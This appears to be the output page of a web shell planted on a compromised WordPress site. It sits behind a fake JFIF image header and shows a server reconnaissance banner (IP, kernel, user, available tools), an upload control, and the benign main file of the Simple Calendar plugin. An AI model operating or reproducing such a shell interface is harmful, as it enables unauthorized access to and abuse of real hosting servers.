????JFIF??x?x????'
Server IP : 104.21.64.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/pontiacques.org/wp-content/plugins/google-calendar-events/ |
Upload File : |
<?php /** * Plugin Name: Simple Calendar * Plugin URI: https://simplecalendar.io * Description: Add Google Calendar events to your WordPress site in minutes. Beautiful calendar displays. Fully responsive. * Author: Simple Calendar * Author URI: https://simplecalendar.io * Version: 3.5.0 * Text Domain: google-calendar-events * Domain Path: /i18n * * @copyright 2013-2023 Xtendify Technologies. All rights reserved. */ // Exit if accessed directly. if (!defined('ABSPATH')) { exit(); } // Plugin constants. $this_plugin_path = trailingslashit(dirname(__FILE__)); $this_plugin_dir = plugin_dir_url(__FILE__); $this_plugin_constants = [ 'SIMPLE_CALENDAR_VERSION' => '3.5.0', 'SIMPLE_CALENDAR_MAIN_FILE' => __FILE__, 'SIMPLE_CALENDAR_URL' => $this_plugin_dir, 'SIMPLE_CALENDAR_ASSETS' => $this_plugin_dir . 'assets/', 'SIMPLE_CALENDAR_PATH' => $this_plugin_path, 'SIMPLE_CALENDAR_INC' => $this_plugin_path . 'includes/', 'SIMPLE_CALENDAR_OAUTH_HELPER_AUTH_DOMAIN' => 'https://auth.simplecalendar.io/', ]; foreach ($this_plugin_constants as $constant => $value) { if (!defined($constant)) { define($constant, $value); } } // Plugin requirements include_once 'includes/wp-requirements.php'; // Check plugin requirements before loading plugin. $this_plugin_checks = new SimCal_WP_Requirements('Simple Calendar', plugin_basename(__FILE__), [ 'PHP' => '7.3', 'WordPress' => '4.2', 'Extensions' => ['curl', 'iconv', 'json', 'mbstring'], ]); if ($this_plugin_checks->pass() === false) { $this_plugin_checks->halt(); return; } include_once 'third-party/vendor/autoload.php'; // Load plugin. include_once 'includes/main.php';